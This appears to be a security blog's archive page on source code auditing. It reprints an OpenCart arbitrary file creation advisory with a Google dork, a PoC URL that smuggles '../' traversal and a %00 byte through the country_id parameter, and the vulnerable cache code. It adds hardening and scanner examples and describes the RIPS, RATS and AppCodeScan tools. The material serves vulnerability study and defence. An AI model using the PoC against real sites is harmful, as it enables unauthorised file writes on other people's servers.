
Archive for the ‘Audit Source Code’ Category

OpenCart Arbitrary File Creation (All versions)


# Exploit Title: OpenCart Arbitrary File Creation (All versions)
# Google Dork: "Powered By OpenCart"
# Date: 2011-09-06
# Author: dhson (danghaison(at)gmail.com)
# Software Link: http://www.opencart.com/index.php?route=download/download
# Version: All versions


PoC

http://www.site.com/index.php?country_id=/../../../demo.php%00&route=account/register/zone&zone_id=1

—————
Vulnerable code
—————

public function set($key, $value) {
    $this->delete($key);

    // $key arrives unsanitised from the request (country_id in the PoC above),
    // so "../" sequences and a %00 byte let it control the path that fopen() opens.
    $file = DIR_CACHE . 'cache.' . $key . '.' . (time() + $this->expire);

    $handle = fopen($file, 'w');

    fwrite($handle, serialize($value));

    fclose($handle);
}
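A hardened version of the cache set() above, as an added example that is not OpenCart's own code: the key is validated against a strict whitelist before it is used in a path, and the resolved parent directory is checked to still be DIR_CACHE. For the demo, DIR_CACHE is pointed at a temp directory and the expiry is assumed to be 3600 seconds.

```php
<?php
// Added example (not OpenCart's own code): the cache set() from the advisory,
// hardened so that a request-controlled key cannot steer the file path.
// Assumptions for this demo: DIR_CACHE points at a temp directory and the
// expiry is 3600 seconds.
define('DIR_CACHE', sys_get_temp_dir() . '/opencart_cache_demo/');
@mkdir(DIR_CACHE, 0700, true);

class HardenedCache {
    private $expire = 3600;

    // Only a conservative whitelist of characters, bounded length, and an
    // explicit ban on NUL bytes and ".." (belt and braces with the regex).
    private function isValidKey($key) {
        if (!is_string($key) || $key === '' || strlen($key) > 128) {
            return false;
        }
        if (strpos($key, "\0") !== false || strpos($key, '..') !== false) {
            return false;
        }
        // \A and \z anchor the whole string; $ alone would allow a trailing newline.
        return preg_match('/\A[A-Za-z0-9._-]+\z/', $key) === 1;
    }

    public function set($key, $value) {
        if (!$this->isValidKey($key)) {
            throw new InvalidArgumentException('invalid cache key');
        }
        $file = DIR_CACHE . 'cache.' . $key . '.' . (time() + $this->expire);
        // Defence in depth: the resolved parent directory must still be DIR_CACHE.
        $parent = realpath(dirname($file));
        if ($parent === false || $parent !== realpath(DIR_CACHE)) {
            throw new RuntimeException('cache path escaped DIR_CACHE');
        }
        file_put_contents($file, serialize($value), LOCK_EX);
        return $file;
    }
}

$cache = new HardenedCache();
// Ordinary key: accepted and written under DIR_CACHE.
echo $cache->set('country.1', array('name' => 'demo')), "\n";
// Key shaped like the advisory's PoC (traversal plus a NUL byte): rejected.
try {
    $cache->set("/../../../demo.php\0", 'x');
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```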


RIPS


RIPS is a static source code analyser for vulnerabilities in PHP web applications.

Download: http://sourceforge.net/projects/rips-scanner/
Features:

  • detect XSS, SQLi, File disclosure, LFI/RFI, RCE vulnerabilities and more
  • 5 verbosity levels for debugging your scan results
  • mark vulnerable lines in source code viewer
  • highlight variables in the code viewer
  • user-defined function code by mouse-over on detected call
  • active jumping between function declaration and calls
  • list of all user-defined functions (defines and calls), program entry points (user input) and scanned files (with includes) connected to the source code viewer
  • create CURL exploits for detected vulnerabilities with a few clicks
  • visualization, description, example, PoC, patch and securing function list for every vulnerability
  • 7 different syntax highlighting colour schemata
  • display scan result in form of a top-down flow or bottom-up trace
  • only minimal requirement is a local webserver with PHP and a browser (tested with Firefox)
  • regex search function
Categories: Audit Source Code

RATS – Rough Auditing Tool for Security


RATS – Rough Auditing Tool for Security – is an open source tool developed and maintained by Secure Software security engineers. Secure Software was acquired by Fortify Software, Inc. RATS is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions.

The RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, describes each problem, and may suggest remedies. It also provides a relative assessment of the potential severity of each problem, to help an auditor prioritise. The tool also performs some basic analysis to try to rule out conditions that are obviously not problems.

As its name implies, the tool performs only a rough analysis of source code. It will not find every error and will also find things that are not errors. Manual inspection of your code is still necessary, but greatly aided with this tool.

Download

Win32: https://www.fortify.com/downloads2/public/rats-2.3-win32.zip

Source tarball: https://www.fortify.com/downloads2/public/rats-2.3.tar.gz

usage: rats [options] [file]...

Options explained:

-d <filename>, --db <filename>, --database <filename>
    Specifies a vulnerability database to be loaded. You may have multiple -d options and each database specified will be loaded.

-h, --help
    Displays a brief usage summary.

-i, --input
    Causes a list of function calls that were used which accept external input to be produced at the end of the vulnerability report.

-l <lang>, --language <lang>
    Force the specified language to be used regardless of filename extension. Currently valid language names are "c", "perl", "php", "python" and "ruby".

-r, --references
    Causes references to vulnerable function calls that are not being used as calls themselves to be reported.

-w <level>, --warning <level>
    Sets the warning level. Valid levels are 1, 2 or 3. Warning level 1 includes only default and high severity; level 2 includes medium severity and is the default; warning level 3 includes low severity vulnerabilities.

-x
    Causes the default vulnerability databases (which are in the installation data directory, /usr/local/lib by default) to not be loaded.

-R, --no-recursion
    Disable recursion into subdirectories.

--xml
    Cause output to be in XML.

--html
    Cause output to be in HTML.

--follow-symlinks
    Evaluate and follow symlinks.


AppCodeScan


This tool is designed to help with whitebox testing. During whitebox testing one needs to scan the complete application code for various vulnerabilities such as XSS, SQL injection, poor validation, etc. This tool makes it possible to discover these vulnerable points, and one can then walk the code base to trace each vulnerability. The tool works in the following two areas:

Code Scanning – One feeds it the target code folder, rule patterns as regexes (a sample is provided for ASP) and a list of file extensions to scan. The tool takes this information, runs against the target folder to a depth of three (3) and scans each line for a matching pattern. If a pattern is found, it reports that line in the tool.
Code Walker – This little utility helps in walking across the code base to find a variable or function. It helps trace variables and their entire path through a large code base, and helps in negating false positives from the identified patterns.

Link download: http://blueinfy.com/AppCodeScan.zip
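A minimal scanner of the kind the Code Scanning mode describes, as an added example that is not AppCodeScan's own code: it walks a target folder to a depth of three, keeps only the listed extensions, and reports every line matching a regex rule. The rules and the sample source tree are constructed for the demo; the rules look for the request-input-into-fopen pattern from the OpenCart advisory above.

```php
<?php
// Added example, not AppCodeScan's own code: a minimal scanner of the kind the
// Code Scanning mode describes: walk a target folder to a depth of three,
// keep only listed extensions, and report every line matching a regex rule.
// The rules and the sample tree below are constructed for this demo; the rules
// look for the request-input-into-fopen pattern seen in the OpenCart advisory.
$rules = array(
    'request input reaches a file write' =>
        '/\b(fopen|file_put_contents)\s*\(.*\$_(GET|POST|REQUEST)\b/i',
    'request input reaches unserialize' =>
        '/\bunserialize\s*\(.*\$_(GET|POST|REQUEST)\b/i',
);
$extensions = array('php', 'inc');

// Level 0 is the target folder itself; levels 0, 1 and 2 are scanned (depth of three).
function scanTree($dir, array $rules, array $extensions, $depth = 3, $level = 0) {
    $hits = array();
    foreach (scandir($dir) as $entry) {
        if ($entry === '.' || $entry === '..') continue;
        $path = $dir . DIRECTORY_SEPARATOR . $entry;
        if (is_dir($path)) {
            if ($level + 1 < $depth) {
                $hits = array_merge($hits, scanTree($path, $rules, $extensions, $depth, $level + 1));
            }
            continue;
        }
        if (!in_array(strtolower(pathinfo($path, PATHINFO_EXTENSION)), $extensions, true)) continue;
        foreach (file($path, FILE_IGNORE_NEW_LINES) as $no => $line) {
            foreach ($rules as $name => $regex) {
                if (preg_match($regex, $line)) {
                    $hits[] = array('file' => $path, 'line' => $no + 1, 'rule' => $name, 'code' => trim($line));
                }
            }
        }
    }
    return $hits;
}

// Constructed sample tree: a hit one level down, and a file four levels down
// that the three-level limit deliberately leaves unscanned.
$root = sys_get_temp_dir() . '/appcodescan_demo';
@mkdir("$root/a/b/c", 0700, true);
file_put_contents("$root/a/cache.php", "<?php\n\$h = fopen(DIR_CACHE . \$_GET['country_id'], 'w');\n");
file_put_contents("$root/a/b/c/deep.php", "<?php\nunserialize(\$_POST['data']);\n");
foreach (scanTree($root, $rules, $extensions) as $h) {
    printf("%s:%d [%s] %s\n", $h['file'], $h['line'], $h['rule'], $h['code']);
}
```

Only a/cache.php is reported; deep.php sits below the depth limit, which is the same blind spot to keep in mind when relying on AppCodeScan's fixed depth.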
